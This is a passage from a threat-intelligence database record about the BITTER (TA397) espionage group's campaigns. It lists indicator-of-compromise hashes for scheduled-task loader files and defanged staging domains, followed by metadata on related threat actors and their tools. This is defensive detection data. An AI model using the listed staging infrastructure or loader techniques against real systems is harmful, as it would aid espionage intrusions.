\r\n55f75724386dbe740c0b868da913af2c8b280335da4fde64e2300c776b79d4e8 | SHA256 | CHM scheduled task loader | February 2025 \r\ncdddbd65dbb24d3b9205e417cc267007bfd0369c316f70d2749887b9f02e949b | SHA256 | MSC scheduled task loader | February 2025 \r\nutizviewstation[.]com | Domain | Staging domain | February 2025 \r\n1fbf95ccf1193e84d0e4f8c315816dd2aec56edb11ef1e7b28667360ca7e5ccd | SHA256 | CHM scheduled task loader | March 2025 \r\n55f75724386dbe740c0b868da913af2c8b280335da4fde64e2300c776b79d4e8 | SHA256 | CHM scheduled task loader | March 2025 \r\n5a39f10d2e4c1cae1b52baff0cf8b3e397da2e69cb90e1bac138e8d437cbea41 | SHA256 | IQY scheduled task loader | March 2025 \r\nblucollinsoutien[.]com | Domain | Staging domain | March 2025 \r\nprincecleanit[.]com | Domain | Staging domain | March 2025 \r\nwoodstocktutors[.]com | Domain | Staging domain | April 2025 \r\nwarsanservices[.]com | Domain | Staging domain | April 2025 \r\nheadntale[.]com | Domain | Staging domain | April 2025 \r\ncc65fac9151fa527bc4b296f699475554ee2510572b8c16d5ef4b472a4cb9ffc | SHA256 | Microsoft Access Database scheduled task loader | April 2025 \r\n680c99915d478ed8d9f1427b3deb2ebd255a6ec614ad643909ab4c01f52905ae | SHA256 | CHM scheduled task loader | April 2025 \r\nc9612051b3956ac8722d8be7994634b7c940be07ca26e2fc8d0d5c94db2e4682 | SHA256 | CHM scheduled task loader | May 2025 \r\nSource: https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one"
	],
	"report_names": [
		"bitter-end-unraveling-eight-years-espionage-antics-part-one"
	],
	"threat_actors": [
		{
			"id": "655f7d0b-7ea6-4950-b272-969ab7c27a4b",
			"created_at": "2022-10-27T08:27:13.133291Z",
			"updated_at": "2026-04-10T02:00:05.315213Z",
			"deleted_at": null,
			"main_name": "BITTER",
			"aliases": [
				"T-APT-17"
			],
			"source_name": "MITRE:BITTER",
			"tools": [
				"ZxxZ"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "bbf66d2d-3d20-4026-a2b5-56b31eb65de4",
			"created_at": "2025-08-07T02:03:25.123407Z",
			"updated_at": "2026-04-10T02:00:03.668131Z",
			"deleted_at": null,
			"main_name": "ZINC EMERSON",
			"aliases": [
				"Confucius ",
				"Dropping Elephant ",
				"EHDevel ",
				"Manul ",
				"Monsoon ",
				"Operation Hangover ",
				"Patchwork ",
				"TG-4410 ",
				"Viceroy Tiger "
			],
			"source_name": "Secureworks:ZINC EMERSON",
			"tools": [
				"Enlighten Infostealer",
				"Hanove",
				"Mac OS X KitM Spyware",
				"Proyecto2",
				"YTY Backdoor"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7a8dbc5e-51a8-437a-8540-7dcb1cc110b8",
			"created_at": "2022-10-25T16:07:23.482856Z",
			"updated_at": "2026-04-10T02:00:04.627414Z",
			"deleted_at": null,
			"main_name": "Confucius",
			"aliases": [
				"G0142"
			],
			"source_name": "ETDA:Confucius",
			"tools": [
				"ApacheStealer",
				"ByeByeShell",
				"ChatSpy",
				"Confucius",
				"MY24",
				"Sneepy",
				"remote-access-c3",
				"sctrls",
				"sip_telephone",
				"swissknife2"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "acd789fa-d488-47f3-b9cc-fdb18b1fa375",
			"created_at": "2023-01-06T13:46:39.332092Z",
			"updated_at": "2026-04-10T02:00:03.290017Z",
			"deleted_at": null,
			"main_name": "HAZY TIGER",
			"aliases": [
				"T-APT-17",
				"APT-C-08",
				"Orange Yali",
				"TA397"
			],
			"source_name": "MISPGALAXY:HAZY TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f5339d7c-473e-4b49-b44c-189b4f72b585",
			"created_at": "2024-12-28T02:01:54.8259Z",
			"updated_at": "2026-04-10T02:00:04.778045Z",
			"deleted_at": null,
			"main_name": "Mysterious Elephant",
			"aliases": [
				"APT-K-47"
			],
			"source_name": "ETDA:Mysterious Elephant",
			"tools": [
				"ORPCBackdoor"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "caf95a6f-2705-4293-9ee1-6b7ed9d9eb4c",
			"created_at": "2022-10-25T15:50:23.472432Z",
			"updated_at": "2026-04-10T02:00:05.352882Z",
			"deleted_at": null,
			"main_name": "Confucius",
			"aliases": [
				"Confucius",
				"Confucius APT"
			],
			"source_name": "MITRE:Confucius",
			"tools": [
				"WarzoneRAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "bf6cb670-bb69-473f-a220-97ac713fd081",
			"created_at": "2022-10-25T16:07:23.395205Z",
			"updated_at": "2026-04-10T02:00:04.578924Z",
			"deleted_at": null,
			"main_name": "Bitter",
			"aliases": [
				"G1002",
				"T-APT-17",
				"TA397"
			],
			"source_name": "ETDA:Bitter",
			"tools": [
				"Artra Downloader",
				"ArtraDownloader",
				"Bitter RAT",
				"BitterRAT",
				"Dracarys"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434577,
	"ts_updated_at": 1775792036,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/731646b712fba1e4210f2dd355a839bd4a31b1ec.pdf",
		"text": "https://archive.orkl.eu/731646b712fba1e4210f2dd355a839bd4a31b1ec.txt",
		"img": "https://archive.orkl.eu/731646b712fba1e4210f2dd355a839bd4a31b1ec.jpg"
	}
}